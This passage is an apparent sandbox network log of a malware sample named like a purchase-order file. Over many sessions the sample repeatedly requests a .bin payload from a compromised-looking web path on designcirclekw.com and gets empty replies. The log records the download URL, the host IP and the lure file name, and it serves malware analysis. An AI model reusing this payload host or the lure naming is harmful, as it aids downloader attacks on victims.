                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
20          192.168.2.8  49996        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:15 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:16 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:15 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
21          192.168.2.8  49997        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:17 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:18 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:17 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
22          192.168.2.8  49998        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:19 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:21 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:19 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
23          192.168.2.8  49999        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:22 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:23 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:22 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
24          192.168.2.8  50000        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:24 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:25 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:24 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
25          192.168.2.8  50001        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:26 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:27 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:26 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
26          192.168.2.8  50002        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:28 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:29 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:28 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
27          192.168.2.8  50003        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:30 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:31 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:30 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
28          192.168.2.8  50004        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:32 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:33 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:33 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
29          192.168.2.8  50005        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:35 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:35 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:35 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
30          192.168.2.8  50006        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:36 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:37 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:37 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
31          192.168.2.8  50007        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:38 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:39 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:39 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
32          192.168.2.8  50008        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:40 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:41 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:41 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
33          192.168.2.8  50009        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:42 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:43 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:42 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
34          192.168.2.8  50010        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:44 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:45 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:44 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
35          192.168.2.8  50011        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:46 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:47 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:46 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.8 | 50012 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:38:48 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:38:49 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:38:48 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.8 | 50013 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:38:50 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:38:51 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:38:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.8 | 50014 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:38:52 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:38:53 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:38:52 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.8 | 50015 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:38:54 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:38:55 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:38:54 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.8 | 50016 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:38:56 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:38:57 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:38:56 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.8 | 50017 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:38:58 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:38:59 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:38:58 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.8 | 50018 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:00 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:01 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:00 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.8 | 50019 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:02 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:03 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:02 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.8 | 50020 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:04 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:04 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:04 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.8 | 50021 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:06 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:06 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:06 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.8 | 50022 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:08 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:08 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:08 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.8 | 50023 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:09 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:10 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:10 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.8 | 50024 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:11 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:12 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:12 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.8 | 50025 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:13 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:14 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:14 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.8 | 50026 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:15 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:16 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:15 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.8 | 50027 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:17 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:19 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:17 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.8 | 50028 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:20 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:21 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:20 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.8 | 50029 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:22 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:23 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:22 GMT
